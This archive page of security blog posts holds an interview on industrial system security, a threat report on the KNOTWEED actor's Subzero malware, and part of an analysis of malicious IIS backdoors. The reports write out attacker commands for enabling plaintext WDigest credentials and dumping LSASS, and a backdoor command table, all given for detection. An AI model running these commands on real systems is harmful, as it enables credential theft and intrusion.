Archive for July, 2022

Anatomy of a Cloud-Service Security Update

July 28th, 2022 No comments

Our security teams around the world focus on identifying and mitigating security issues as soon as possible while minimizing customer disruption. One of the challenges of a traditional security update is ensuring customers apply the protections promptly. We recently discussed the work that goes into these updates in The Anatomy of a Security update.  Cloud …

Anatomy of a Cloud-Service Security Update Read More »

Categories: Uncategorized Tags:

Industrial systems: What it takes to secure and staff them

July 28th, 2022 No comments

The security community is continuously changing, growing, and learning from each other to better position the world against cyberthreats. In the latest post of our Community Voices blog series, Microsoft Security Senior Product Marketing Manager Brooke Lynn Weenig talks with Patrick C. Miller, Chief Executive Officer (CEO) and owner of Ampere Industrial Security and the founder and former Director of the Energy Sector Security Consortium. The thoughts below reflect Patrick’s views, not the views of Patrick’s employer, and are not legal advice. In this blog post, Patrick talks about security and hiring challenges in the industrial security industry.

Brooke: How did you get into industrial security?

Patrick: My dad was in telecommunications, so I grew up with a wire in one hand and a flashlight in my teeth, crawling down dark holes full of asbestos and dust and running wires. I built a lot of analog phone systems, and even had a pair of pole spikes, a test set, and a hard hat. I have done everything from climbing poles and stringing line to wiring building-size main distribution frames (MDFs). I was a phone tech who programmed phone systems for most of my younger days. I had done a lot of the security components on the telecom side. Back then, there were a lot of things like long-distance fraud and voicemail access that had to be secure.

I was going to school for biology, with a focus on the botany and microbiology side, when I got a chance to touch the supervisory control and data acquisition (SCADA), operational technology (OT), and industrial control system (ICS) environments as a side job. I was working as a propagation manager for an exceptionally large commercial greenhouse operation, using my biology skills and doing technical stuff. I merged them together and automated a bunch of horticulture warehouse operations, including light, shade, temperature, water, and airflow management. That is where I got my toe in the water of programming and building in industrial environments.

Brooke: How did you grow your skills in the industrial security world?

Patrick: There were no security certificates or college courses in the late 1980s and early 1990s. I fell backward into operational security because of incident response. We had things like bulletin board systems. I had one of the first dial-up modems, and I would go through my university account and look up how to do something. I learned primarily through 2600: The Hacker Quarterly and hands-on success or failure from whatever tutorials were available back then.

Now, I specialize in ICS or OT. Whether it is water in a pipe, power on a wire, traffic on the street, boxes on a belt—it is all flow control. It is incredibly challenging but also very satisfying. At the end of the day, you know you helped keep the lights on, keep the water flowing, keep the gas moving, whatever it may be. Those are critical infrastructures.

Brooke: Why are industrial systems targeted in cyberattacks?

Patrick: Gas, water, electricity, food processing, and transportation are all very necessary. Civilization depends on these infrastructure services. If I am a ransomware operator or a criminal, I can hold your system hostage and since you know there is a quick and severe impact, there is a high likelihood you are going to pay me. They are a high-value target from a criminal aspect as well as from a nation-state or geopolitical perspective for the same reasons but different motivations.

Proprietary information is a target as well. If you have some product or manufacturing or a better way of doing something, I do not have to do the research and development (R&D) to compete with you. I can just steal all your data and do what you do better because I am not spending all the money on R&D and effort. For lots of varied reasons, they are high-value targets.

Brooke: What are the biggest challenges in securing industrial systems?

Patrick: With industrial systems, our biggest worry is our legacy environment because it is just old. Some of the components have been around 40 to 50 years. They are digital-ish and they have analog inputs, but they were not designed to be networked. They were designed to be in a closed system where you had to have physical access to them, but we networked them anyway. They are terribly insecure because the expectation was that these environments would never connect to anything else.

We are seeing a trend to not necessarily disconnect them, but rather connect them in smarter ways. And if you need access to these environments, you must jump through enormous amounts of pain to get an inbound connection. We are just isolating the heck out of it and finding ways to intelligently island or “turtle-mode” those environments so they can operate by themselves. That way, if you have a problem, you can still run the important stuff in an isolated, disconnected mode and you do not lose power, water, gas, or whatever it may be.

If there’s ransomware burning through your corporate environment, you can take your industrial environment and shut it off from the outside world so it can operate in “turtle mode.” However, costs go up. Isolation is expensive and extra architecture is expensive. There are a ton of challenges, both financially and operationally, in trying to move toward a more defendable architecture than we had.

Brooke: What else can enterprises do to protect themselves from these security risks?

Patrick: I have done multiple presentations on if you can only do some things, do these things. They may sound simple, but they are often not easily done in industrial environments:

  • Do asset inventory. If you do not know what you have, you do not know what to protect because you do not even know that exists.
  • Get rid of any of those fragile systems. Like if it is under someone’s desk and critical but you cannot replace it because you do not know how, that is a huge risk. Find a way to replace it with something new that you can defend.
  • Design a network you can defend. Get it to a place where you can truly isolate it with no dependencies.
  • Lock down remote access. Attacks usually come from the IT side.
  • Have effective change management.
  • Practice incidence response like it is game day.
  • Train your people and give them what they need to operate that environment and the time to do it.

Brooke: How can industrial security leaders attract more talent?

Patrick: I do not think there is a skills gap. There are a lot of people out there who would do and can do this job if we figure out how to characterize it well. You do not need to be a programmer or a cybersecurity expert to learn this stuff. It involves systems, connected in certain ways, and doing things in very methodical and predictable methods. It is not something outside the norm for most technical minds.

I typically see no entry-level path to get people into the industry. Your expectation is you are going to hire somebody who is a junior and needs 5 to 10 years of experience even as a junior. A lot of these job descriptions are entirely unrealistic. I see job descriptions where they are asking for more experience on a platform than that platform has existed. There are a lot of people you could get who have basic skills and you train them for a week or two. They are going to be hungry to show you what they can do and just grow from there.

Brooke: What skills do industry security professionals need to be successful?

Patrick: Industrial security sounds harder than it really is. When I train people, we break it down into these simple, bite-sized pieces and little breadcrumbs of steps. At the end of the day, they say, “Wow, that was way simpler than I had thought it was.” There is this mysterious cloud about cybersecurity, but it is just lots of small parts. You just must learn what all the parts are and what the acronyms are. Once it is described in a real-world kind of application, most people pick it up quickly.

Most of it is they must be curious enough. Empathy is another because to secure a system, you must have some empathy for what you are doing and why it is important. In the IT and OT world, you have engineering folks, and they just want the thing to work. If there is an alarm going off on their screen and they must react and click something, they do not want their screen to lock them out so they cannot click that button, which in some cases could cause the plant to have big problems. You must have enough empathy for their situation and what they need, and then, as a security professional, design around that so they can still have those things but in a more secure way. If you can be detail-oriented and have strong curiosity and empathy, you can succeed in this space.

Learn more

To learn more about Microsoft Security solutions, visit our website. Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us at @MSFTSecurity for the latest news and updates on cybersecurity.

The post Industrial systems: What it takes to secure and staff them appeared first on Microsoft Security Blog.

Untangling KNOTWEED: European private-sector offensive actor using 0-day exploits

The Microsoft Threat Intelligence Center (MSTIC) and the Microsoft Security Response Center (MSRC) found a private-sector offensive actor (PSOA) using multiple Windows and Adobe 0-day exploits, including one for the recently patched CVE-2022-22047, in limited and targeted attacks against European and Central American customers. The PSOA, which MSTIC tracks as KNOTWEED, developed malware called Subzero which was used in these attacks.

This blog details Microsoft’s analysis of the observed KNOTWEED activity and related malware used in targeted attacks against our customers. This information is shared with our customers and industry partners to improve detection of these attacks. Customers are encouraged to expedite deployment of the July 2022 Microsoft security updates to protect their systems against exploits using CVE-2022-22047. Microsoft Defender Antivirus and Microsoft Defender for Endpoint have also implemented detections against KNOTWEED’s malware and tools.

PSOAs, which Microsoft also refers to as cyber mercenaries, sell hacking tools or services through a variety of business models. Two common models for this type of actor are access-as-a-service and hack-for-hire. In access-as-a-service, the actor sells full end-to-end hacking tools that can be used by the purchaser in operations, with the PSOA not involved in any targeting or running of the operation. In hack-for-hire, detailed information is provided by the purchaser to the actor, who then runs the targeted operations. Based on observed attacks and news reports, MSTIC believes that KNOTWEED may blend these models: they sell the Subzero malware to third parties but have also been observed using KNOTWEED-associated infrastructure in some attacks, suggesting more direct involvement.


KNOTWEED is an Austria-based PSOA named DSIRF. The DSIRF website [web archive link] says they provide services “to multinational corporations in the technology, retail, energy and financial sectors” and that they have “a set of highly sophisticated techniques in gathering and analyzing information.” They publicly offer several services including “an enhanced due diligence and risk analysis process through providing a deep understanding of individuals and entities” and “highly sophisticated Red Teams to challenge your company’s most critical assets.”

However, multiple news reports have linked DSIRF to the development and attempted sale of a malware toolset called Subzero. MSTIC found the Subzero malware being deployed through a variety of methods, including 0-day exploits in Windows and Adobe Reader, in 2021 and 2022. As part of our investigation into the utility of this malware, Microsoft’s communications with a Subzero victim revealed that they had not commissioned any red teaming or penetration testing, and confirmed that it was unauthorized, malicious activity. Observed victims to date include law firms, banks, and strategic consultancies in countries such as Austria, the United Kingdom, and Panama. It’s important to note that the identification of targets in a country doesn’t necessarily mean that a DSIRF customer resides in the same country, as international targeting is common.

MSTIC has found multiple links between DSIRF and the exploits and malware used in these attacks. These include command-and-control infrastructure used by the malware directly linking to DSIRF, a DSIRF-associated GitHub account being used in one attack, a code signing certificate issued to DSIRF being used to sign an exploit, and other open-source news reports attributing Subzero to DSIRF.

Observed actor activity

KNOTWEED initial access

MSTIC found KNOTWEED’s Subzero malware deployed in a variety of ways. In the succeeding sections, the different stages of Subzero are referred to by their Microsoft Defender detection names: Jumplump for the persistent loader and Corelump for the main malware.

KNOTWEED exploits in 2022

In May 2022, MSTIC found an Adobe Reader remote code execution (RCE) and a 0-day Windows privilege escalation exploit chain being used in an attack that led to the deployment of Subzero. The exploits were packaged into a PDF document that was sent to the victim via email. Microsoft was not able to acquire the PDF or Adobe Reader RCE portion of the exploit chain, but the victim’s Adobe Reader version was released in January 2022, meaning that the exploit used was either a 1-day exploit developed between January and May, or a 0-day exploit. Based on KNOTWEED’s extensive use of other 0-days, we assess with medium confidence that the Adobe Reader RCE is a 0-day exploit. The Windows exploit was analyzed by MSRC, found to be a 0-day exploit, and then patched in July 2022 as CVE-2022-22047. Interestingly, there were indications in the Windows exploit code that it was also designed to be used from Chromium-based browsers, although we’ve seen no evidence of browser-based attacks.

The CVE-2022-22047 vulnerability is related to an issue with activation context caching in the Client Server Run-Time Subsystem (CSRSS) on Windows. At a high level, the vulnerability could enable an attacker to provide a crafted assembly manifest, which would create a malicious activation context in the activation context cache, for an arbitrary process. This cached context is used the next time the process spawned.

CVE-2022-22047 was used in KNOTWEED related attacks for privilege escalation. The vulnerability also provided the ability to escape sandboxes (with some caveats, as discussed below) and achieve system-level code execution. The exploit chain starts with writing a malicious DLL to disk from the sandboxed Adobe Reader renderer process. The CVE-2022-22047 exploit was then used to target a system process by providing an application manifest with an undocumented attribute that specified the path of the malicious DLL. Then, when the system process next spawned, the attribute in the malicious activation context was used, the malicious DLL was loaded from the given path, and system-level code execution was achieved.

It’s important to note that exploiting CVE-2022-22047 requires attackers to be able to write a DLL to disk. However, in the threat model of sandboxes, such as that of Adobe Reader and Chromium, the ability to write out files where the attacker cannot control the path isn’t considered dangerous. Hence, these sandboxes aren’t a barrier to the exploitation of CVE-2022-22047.

KNOTWEED exploits in 2021

In 2021, MSRC received a report of two Windows privilege escalation exploits (CVE-2021-31199 and CVE-2021-31201) being used in conjunction with an Adobe Reader exploit (CVE-2021-28550), all of which were patched in June 2021. MSTIC was able to confirm the use of these in an exploit chain used to deploy Subzero.

We were later able to link the deployment of Subzero to a fourth exploit, one related to a Windows privilege escalation vulnerability in the Windows Update Medic Service (CVE-2021-36948), which allowed an attacker to force the service to load an arbitrary signed DLL. The malicious DLL used in the attacks was signed by ‘DSIRF GmbH’.

A screenshot of the digital signature details tab from the file properties page. The tab states that the digital signature for the file is OK. The name indicated under the signer information portion is DSIRF GmbH.
Figure 1. Valid digital signature from DSIRF on Medic Service exploit DLL

Malicious Excel documents

In addition to the exploit chains, another method of access that led to the deployment of Subzero was an Excel file masquerading as a real estate document. The file contained a malicious macro that was obfuscated with large chunks of benign comments from the Kama Sutra, string obfuscation, and use of Excel 4.0 macros.

Two screenshots of macro code snippet, presenting different examples of how the macro is obfuscated to evade detection. In the first code snippet, text from the Kama Sutra is inserted among the macro code. The second code snippet presents the code of a function where the attacker uses Excel 4 macro for obfuscation.
Figure 2: Two examples of KNOTWEED Excel macro obfuscation

After de-obfuscating strings at runtime, the VBA macro uses the ExecuteExcel4Macro function to call native Win32 functions to load shellcode into memory allocated using VirtualAlloc. Each opcode is individually copied into a newly allocated buffer using memset before CreateThread is called to execute the shellcode.

A screenshot of a code snippet where the malware copies opcode to a newly allocated buffer.
Figure 3: Copying opcodes
A screenshot of a code snippet where the malware calls the CreateThread function to execute the shellcode.
Figure 4: Calling CreateThread on shellcode

The following section describes the shellcode executed by the macro.

KNOTWEED malware and tactics, techniques, and procedures (TTPs)

Corelump downloader and loader shellcode

The downloader shellcode is the initial shellcode executed from either the exploit chains or malicious Excel documents. The shellcode’s purpose is to retrieve the Corelump second-stage malware from the actor’s command-and-control (C2) server. The downloader shellcode downloads a JPEG image that contains extra encrypted data appended to the end of the file (past the 0xFF 0xD9 marker that signifies the end of a JPEG file). The JPEG is then written to the user’s %TEMP% directory.

Figure 5: One of the images embedded with the loader shellcode and Corelump

The downloader shellcode searches for a 16-byte marker immediately following the end of JPEG. After finding the marker, the downloader shellcode RC4 decrypts the loader shellcode using the next 16 bytes as the RC4 key. Finally, the loader shellcode RC4 decrypts the Corelump malware using a second RC4 key and manually loads it into memory.

Corelump malware

Corelump is the main payload and resides exclusively in memory to evade detection. It contains a variety of capabilities including keylogging, capturing screenshots, exfiltrating files, running a remote shell, and running arbitrary plugins downloaded from KNOTWEED’s C2 server.

As part of installation, Corelump makes copies of legitimate Windows DLLs and overwrites sections of them with malicious code. As part of this process, Corelump also modifies the fields in the PE header to accommodate the nefarious changes, such as adding new exported functions, disabling Control Flow Guard, and modifying the image file checksum with a computed value from CheckSumMappedFile. These trojanized binaries (Jumplump) are dropped to disk in C:\Windows\System32\spool\drivers\color\, and COM registry keys are modified for persistence (see the Behaviors section for more information on COM hijacking).

Jumplump loader

Jumplump is responsible for loading Corelump into memory from the JPEG file in the %TEMP% directory. If Corelump is not present, Jumplump attempts to download it again from the C2 server. Both Jumplump and the downloader shellcode are heavily obfuscated to make analysis difficult, with most instructions being followed by a jmp to another instruction/jmp combination, giving a convoluted control flow throughout the program.

A screenshot of assembly code presenting the jmp/instruction obfuscation used in Jumplump malware.
Figure 6: Disassembly showing the jmp/instruction obfuscation used in Jumplump

Mex and PassLib

KNOTWEED was also observed using the bespoke utility tools Mex and PassLib. These tools are developed by KNOTWEED and bear capabilities that are derived from publicly available sources. Mex, for example, is a command-line tool containing several red teaming or security plugins copied from GitHub (listed below):

Chisel mimikatz SharpHound3
Curl Ping Castle SharpOxidResolver
Grouper2 Rubeus PharpPrinter
Internal Monologue SCShell SpoolSample
Inveigh Seatbelt StandIn
Lockless SharpExec  

PassLib is a custom password stealer tool capable of dumping credentials from a variety of sources including web browsers, email clients, LSASS, LSA secrets, and the Windows credential manager.

Post-compromise actions

In victims where KNOTWEED malware had been used, a variety of post-compromise actions were observed:

  • Setting of UseLogonCredential to “1” to enable plaintext credentials:
    • reg  add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f
  • Credential dumping via comsvcs.dll:
    • rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump
  • Attempt to access emails with dumped credentials from a KNOTWEED IP address
  • Using Curl to download KNOTWEED tooling from public file shares such as vultrobjects[.]com
  • Running PowerShell scripts directly from a GitHub gist created by an account associated with DSIRF

KNOTWEED infrastructure connections to DSIRF

Pivoting off a known command-and-control domain identified by MSTIC, acrobatrelay[.]com, RiskIQ expanded the view of KNOTWEED’s attack infrastructure. Leveraging unique patterns in the use of SSL certificates and other network fingerprints specific to the group and associated with that domain, RiskIQ identified a host of additional IP addresses under the control of KNOTWEED.  This infrastructure, largely hosted by Digital Ocean and Choopa, has been actively serving malware since at least February of 2020 and continues through the time of this writing.

RiskIQ next utilized passive DNS data to determine which domains those IPs resolved to at the time they were malicious. This process yielded several domains with direct links to DSIRF, including demo3[.]dsirf[.]eu (the company’s own website), and several subdomains that appear to have been used for malware development, including debugmex[.]dsirflabs[.]eu (likely a server used for debugging malware with the bespoke utility tool Mex) and szstaging[.]dsirflabs[.]eu (likely a server used to stage Subzero malware).

Detection and prevention

Microsoft will continue to monitor KNOTWEED activity and implement protections for our customers. The current detections and IOCs detailed below are in place and protecting Microsoft customers across our security products. Additional advanced hunting queries are also provided below to help organizations extend their protections and investigations of these attacks.


Corelump drops the Jumplump loader DLLs to C:\Windows\System32\spool\drivers\color\. This is a common directory used by malware as well as some legitimate programs, so writes of PE files to the folder should be monitored.

Jumplump uses COM hijacking for persistence, modifying COM registry keys to point to the Jumplump DLL in C:\Windows\System32\spool\drivers\color\. Modifications of default system CLSID values should be monitored to detect this technique (e.g., HKLM\SOFTWARE\Classes\CLSID\{GUID}\InProcServer32 Default value). The five CLSIDs used by Jumplump are listed below with their original clean values on Windows 11:

  • {ddc05a5a-351a-4e06-8eaf-54ec1bc2dcea} = “%SystemRoot%\System32\ApplicationFrame.dll
  • {1f486a52-3cb1-48fd-8f50-b8dc300d9f9d} = “%SystemRoot%\system32\propsys.dll
  • {4590f811-1d3a-11d0-891f-00aa004b2e24} = “%SystemRoot%\system32\wbem\wbemprox.dll
  • {4de225bf-cf59-4cfc-85f7-68b90f185355} = “%SystemRoot%\system32\wbem\wmiprvsd.dll
  • {F56F6FDD-AA9D-4618-A949-C1B91AF43B1A} = “%SystemRoot%\System32\Actioncenter.dll

Many of the post-compromise actions can be detected based on their command lines. Customers should monitor for possible malicious activity such as PowerShell executing scripts from internet locations, modification of commonly abused registry keys such as HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest, and LSASS credential dumping via minidumps.

Recommended customer actions

The techniques used by the actor and described in the Observed actor activity section can be mitigated by adopting the security considerations provided below:

  • All customers should prioritize patching of CVE-2022-22047.
  • Confirm that Microsoft Defender Antivirus is updated to security intelligence update 1.371.503.0 or later to detect the related indicators.
  • Use the included indicators of compromise to investigate whether they exist in your environment and assess for potential intrusion.
  • Change Excel macro security settings to control which macros run and under what circumstances when you open a workbook. Customers can also stop malicious XLM or VBA macros by ensuring runtime macro scanning by Antimalware Scan Interface (AMSI) is on. This feature—enabled by default—is on if the Group Policy setting for Macro Run Time Scan Scope is set to “Enable for All Files” or “Enable for Low Trust Files”.
  • Enable multifactor authentication (MFA) to mitigate potentially compromised credentials and ensure that MFA is enforced for all remote connectivity. Note: Microsoft strongly encourages all customers download and use password-less solutions like Microsoft Authenticator to secure accounts.
  • Review all authentication activity for remote access infrastructure, with a particular focus on accounts configured with single factor authentication, to confirm authenticity and investigate any anomalous activity.

Indicators of compromise (IOCs)

The following list provides IOCs observed during our investigation. We encourage our customers to investigate these indicators in their environments and implement detections and protections to identify past related activity and prevent future attacks against their systems. All sample hashes are available in VirusTotal.

Indicator Type Description
78c255a98003a101fa5ba3f49c50c6922b52ede601edac5db036ab72efc57629 SHA-256 Malicious Excel document and VBA
0588f61dc7e4b24554cffe4ea56d043d8f6139d2569bc180d4a77cf75b68792f SHA-256 Malicious Excel document and VBA
441a3810b9e89bae12eea285a63f92e98181e9fb9efd6c57ef6d265435484964 SHA-256 Jumplump malware
cbae79f66f724e0fe1705d6b5db3cc8a4e89f6bdf4c37004aa1d45eeab26e84b SHA-256 Jumplump malware
fd6515a71530b8329e2c0104d0866c5c6f87546d4b44cc17bbb03e64663b11fc SHA-256 Jumplump malware
5d169e083faa73f2920c8593fb95f599dad93d34a6aa2b0f794be978e44c8206 SHA-256 Jumplump malware
7f29b69eb1af1cc6c1998bad980640bfe779525fd5bb775bc36a0ce3789a8bfc SHA-256 Jumplump malware
02a59fe2c94151a08d75a692b550e66a8738eb47f0001234c600b562bf8c227d SHA-256 Jumplump malware
7f84bf6a016ca15e654fb5ebc36fd7407cb32c69a0335a32bfc36cb91e36184d SHA-256 Jumplump malware
afab2e77dc14831f1719e746042063a8ec107de0e9730249d5681d07f598e5ec SHA-256 Jumplump malware
894138dfeee756e366c65a197b4dbef8816406bc32697fac6621601debe17d53 SHA-256 Jumplump malware
4611340fdade4e36f074f75294194b64dcf2ec0db00f3d958956b4b0d6586431 SHA-256 Jumplump malware
c96ae21b4cf2e28eec222cfe6ca903c4767a068630a73eca58424f9a975c6b7d SHA-256 Corelump malware
fa30be45c5c5a8f679b42ae85410f6099f66fe2b38eb7aa460bcc022babb41ca SHA-256 Mex tool
e64bea4032cf2694e85ede1745811e7585d3580821a00ae1b9123bb3d2d442d6 SHA-256 Passlib tool
acrobatrelay[.]com Domain C2
finconsult[.]cc Domain C2
realmetaldns[.]com Domain C2

NOTE: These indicators should not be considered exhaustive for this observed activity.


Microsoft Defender Antivirus

Microsoft Defender Antivirus detects the malware tools and implants used by KNOTWEED starting with signature build  1.371.503.0 as the following family names:

  • Backdoor:O97M/JumplumpDropper
  • Trojan:Win32/Jumplump
  • Trojan:Win32/Corelump
  • HackTool:Win32/Mexlib
  • Trojan:Win32/Medcerc
  • Behavior:Win32/SuspModuleLoad

Microsoft Defender for Endpoint

Microsoft Defender for Endpoint customers may see the following alerts as an indication of a possible attack. These alerts are not necessarily an indication of KNOTWEED compromise:

  • COM Hijacking – Detects multiple behaviors, including JumpLump malware persistence techniques.
  • Possible privilege escalation using CTF module – Detects a possible privilege escalation behavior associated with CVE-2022-2204; also detects an attempt to perform local privilege escalation by launching an elevated process and loading an untrusted module to perform malicious activities
  • KNOTWEED actor activity detected – Detects KNOTWEED actor activities
  • WDigest configuration change – Detects potential retrieval of clear text password from changes to UseLogonCredential registry key
  • Sensitive credential memory read – Detects LSASS credential dumping via minidumps
  • Suspicious Curl behavior – Detects the use of Curl to download KNOTWEED tooling from public file shares
  • Suspicious screen capture activity – Detects Corelump behavior of capturing screenshots of the compromised system

Hunting queries

Microsoft Sentinel

The following resources are available to Microsoft Sentinel customers to identify the activity outlined in the blog post.

Microsoft Defender Antivirus detections related to KNOTWEED

This query identifies occurrences of Microsoft Defender Antivirus detections listed in this blog post:

File hash IOCs related to KNOTWEED

This query identifies matches based on file hash IOCs related to KNOTWEED across a range of common Microsoft Sentinel data sets:

Domain IOCs related to KNOTWEED

This query identifies matches based on domain IOCs related to KNOTWEED across a range of common Microsoft Sentinel data sets:

COM registry key modified to point to Color Profile folder

This query identifies modifications to COM registry keys to point to executable files in C:\Windows\System32\spool\drivers\color\:

PE file dropped in Color Profile folder

This query looks for PE files being created in the C:\Windows\System32\spool\drivers\color\ folder:

Abnormally large JPEG downloaded from new source

This query looks for downloads of JPEG files from remote sources, where the file size is abnormally large, and not from a common source:

Downloading new file using Curl

This query looks for new files being downloaded using Curl.

Suspected credential dumping

This query looks for attackers using comsvcs.dll to dump credentials from memory

Downgrade to plaintext credentials

This query looks for registry key being set to enabled plain text credentials

Microsoft 365 Defender advanced hunting

Microsoft 365 Defender customers can run the following advanced hunting queries to locate IOCs and related malicious activity in their environments.

Microsoft Defender Antivirus detections related to KNOTWEED

This query identifies detection of related malware and tools by Microsoft Defender Antivirus:

File hash IOCs related to KNOTWEED

This query surfaces KNOTWEED file hash IOCs across Microsoft Defender for Endpoint tables:

Domain IOCs related to KNOTWEED

This query identifies matches based on domain IOCs related to KNOTWEED against Microsoft Defender for Endpoint device network connections:

COM registry key modified to point to Color Profile folder

This query identifies modifications to COM registry keys to point to executable files in C:\Windows\System32\spool\drivers\color\:

PE file dropped in Color Profile folder

This query looks for PE files being created in the C:\Windows\System32\spool\drivers\color\ folder:

Downloading new file using Curl

This query looks for new files being downloaded using Curl.

The post Untangling KNOTWEED: European private-sector offensive actor using 0-day exploits appeared first on Microsoft Security Blog.

Malicious IIS extensions quietly open persistent backdoors into servers

July 26th, 2022 No comments

Attackers are increasingly leveraging Internet Information Services (IIS) extensions as covert backdoors into servers, which hide deep in target environments and provide a durable persistence mechanism for attackers. While prior research has been published on specific incidents and variants, little is generally known about how attackers leverage the IIS platform as a backdoor.

Malicious IIS extensions are less frequently encountered in attacks against servers, with attackers often only using script web shells as the first stage payload. This leads to a relatively lower detection rate for malicious IIS extensions compared to script web shells. IIS backdoors are also harder to detect since they mostly reside in the same directories as legitimate modules used by target applications, and they follow the same code structure as clean modules. In most cases, the actual backdoor logic is minimal and cannot be considered malicious without a broader understanding of how legitimate IIS extensions work, which also makes it difficult to determine the source of infection.

Typically, attackers first exploit a critical vulnerability in the hosted application for initial access before dropping a script web shell as the first stage payload. At a later point in time, the attackers then install an IIS backdoor to provide highly covert and persistent access to the server. Attackers can also install customized IIS modules to fit their purposes, as we observed in a campaign targeting Exchange servers between January and May 2022, as well as in our prior research on the custom IIS backdoors ScriptModule.dll and App_Web_logoimagehandler.ashx.b6031896.dll. Once registered with the target application, the backdoor can monitor incoming and outgoing requests and perform additional tasks, such as running remote commands or dumping credentials in the background as the user authenticates to the web application.

As we expect attackers to continue to increasingly leverage IIS backdoors, it’s vital that incident responders understand the basics of how these attacks function to successfully identify and defend against them. Organizations can further improve their defenses with Microsoft 365 Defender, whose protection capabilities are informed by research like this and our unique visibility into server attacks and compromise. With critical protection features like threat and vulnerability management and antivirus capabilities, Microsoft 365 Defender provides organizations with a comprehensive solution that coordinates protection across domains, spanning email, identities, cloud, and endpoints.

In this blog post, we detail how IIS extensions work and provide insight into how they are being leveraged by attackers as backdoors. We also share some of our observations on the IIS threat landscape over the last year to help defenders identify and protect against this threat and prepare the larger security community for any increased sophistication. More specifically, the blog covers the following topics:

Understanding IIS extensions

IIS is a flexible, general purpose web server that has been a core part of the Windows platform for many years now. As an easy-to-manage, modular, and extensible platform for hosting websites, services, and applications, IIS serves critical business logic for numerous organizations. The modular architecture of IIS allows users to extend and customize web servers according to their needs. These extensions can be in the form of native (C/C++) and managed (C#, VB.NET) code structures, with the latter being our focus on this blog post. The extensions can further be categorized as modules and handlers.

The IIS pipeline is a series of extensible objects that are initiated by the ASP.NET runtime to process a request. IIS modules and handlers are .NET components that serve as the main points of extensibility in the pipeline. Each request is processed by multiple IIS modules before being processed by a single IIS handler. Like a set of building blocks, modules and handlers are added to provide the desired functionality for the target application. In addition, handlers can be configured to respond to specific attributes in the request such a URL, file extension, and HTTP method. For example, Aspnet_isapi.dll is a pre-configured IIS handler for common .aspx extensions.

Creating custom managed IIS modules

To create a managed IIS module, the code must implement the IHttpModule interface. The IHttpModule interface has two methods with the following signatures: Init() and Dispose().

Graphical user interface, text, application
Figure 1. IIS module skeleton

Inside Init(), the module can synchronize with any number of HTTP events available in the request pipeline, listed here in sequential order:

  • BeginRequest
  • AuthenticateRequest
  • AuthorizeRequest
  • ResolveRequestCache
  • AcquireRequestState
  • PreRequestHandlerExecute
  • PostRequestHandlerExecute
  • ReleaseRequestState
  • UpdateRequestCache
  • EndRequest
  • PreSendRequestHeaders
  • PreSendRequestContent

The newly created extension should then be mapped with the target application to complete the registration. Generally, there are several methods that can be used to map managed modules for legitimate purposes. On the other hand, we observed that attackers used the following techniques to register malicious IIS extensions during attacks:

Register with global assembly cache (GAC) PowerShell API: Every device with Common Language Runtime (CLR) hosts a device-wide cache called the global assembly cache (GAC). The GAC stores assemblies specifically designated to be shared by several applications on the device. GacInstall() is a PowerShell API to add modules into the global cache. Once installed, the module is available under the path %windir%\Microsoft.NET\assembly and is mapped to IIS (w3wp.exe) using appcmd.exe.

Text of attacker's command
Figure 2. Attacker command using the GAC PowerShell API

Register using appcmd.exe: Appcmd.exe is the single command line tool for managing IIS. All critical aspects, such as adding or removing modules and handlers, can be performed using the utility. In this case, the attackers drop the malicious extension in the target application’s /bin folder and map it using the add module command.

Text of attacker's command
Figure 3. Attacker command using appcmd.exe

Register using gacutil.exe: Gacutil.exe is a Visual Studio shipped .NET GAC utility. The tool allows the user to view and manipulate the contents of the GAC, including installing new modules using the -I option.

Text of attacker's command
Figure 4. Attacker command using gacutil.exe

Register using web.config: After dropping the module in the application’s /bin folder, attackers can also edit the web.config of the target application or the global config file, applicationHost.config, to register the module.

Text of attacker's command
Figure 5. Malicious web.config entry

Upon successful registration, the module is visible inside the IIS manager application.

IIS manager app with installed module
Figure 6. Installed module visible in the list

Attack flow using a custom IIS backdoor

Between January and May 2022, our IIS-related detections picked up an interesting campaign targeting Microsoft Exchange servers. Web shells were dropped in the path %ExchangeInstallPath%\FrontEnd\HttpProxy\owa\auth\ via ProxyShell exploit.

After a period of doing reconnaissance, dumping credentials, and establishing a remote access method, the attackers installed a custom IIS backdoor called FinanceSvcModel.dll in the folder C:\inetpub\wwwroot\bin\. The backdoor had built-in capability to perform Exchange management operations, such as enumerating installed mailbox accounts and exporting mailboxes for exfiltration, as detailed below.  

Command runs

PowerShDLL toolkit, an open-source project to run PowerShell without invoking powershell.exe, was used to run remote commands. The attacker avoided invoking common living-off-the-land binaries (LOLBins), such as cmd.exe or powershell.exe in the context of the Exchange application pool (MSExchangeOWAAppPool) to evade related detection logic.

Attacker's command via PowerShDLL toolkit
Figure 7. Using PowerShDLL to run remote commands

Credential access

The attackers enabled WDigest registry settings, which forced the system to use WDigest protocol for authentication, resulting in lsass.exe retaining a copy of the user’s plaintext password in memory. This change allowed the attackers to steal the actual password, not just the hash. Later, Mimikatz was run to dump local credentials and perform a DCSYNC attack.

Attacker command to steal user's password
Figure 8. Mimikatz usage

Remote access

The attackers used plink.exe, a command-line connection tool like SSH. The tool allowed the attackers to bypass network restrictions and remotely access the server through tunneled RDP traffic.

Attacker command to bypass network restrictions
Figure 9. Bypassing network restrictions


The attacker invoked the IIS backdoor by sending a crafted POST request with a cookie EX_TOKEN. The module extracts the cookie value and initiates a mailbox export request with the supplied filter.

Attacker's POST request
Figure 10. Attacker-generated POST request

The value decodes to: ep,06/21/2022,06/21/2022,C:\Windows\Web,Administrator, where ep is the command to initiate the mailbox export request with filters determining the start and end dates followed by the export path. The final command has the following syntax:

Attacker's mailbox export request
Figure 11. Attacker-generated mailbox export request
Code snippet
 Figure 12. Mailbox export code snippet

The table below details all the commands found in the backdoor:

Command Description
test Attempts to load Exchange Management Shell (EMS)- Add-PSSnapin Microsoft.Exchange.Management.Powershell.SnapIn
box List all UserPrincipalNames-  foreach ($name in Get-Mailbox -ResultSize unlimited){ Write-Output $name.UserPrincipalName}
ep Run New-MailboxExportRequest cmdlet with supplied mailbox name, start and end date, and export path as filters.
gep Get the task ID associated with the export request
ruh Tamper with Exchange logs

Types of IIS backdoors

Reviewing the malicious managed (.NET) IIS extensions observed over the past year, we grouped these extensions based on various factors such as similar capabilities and sources of origin, as further detailed in the below sections. 

Web shell-based variants

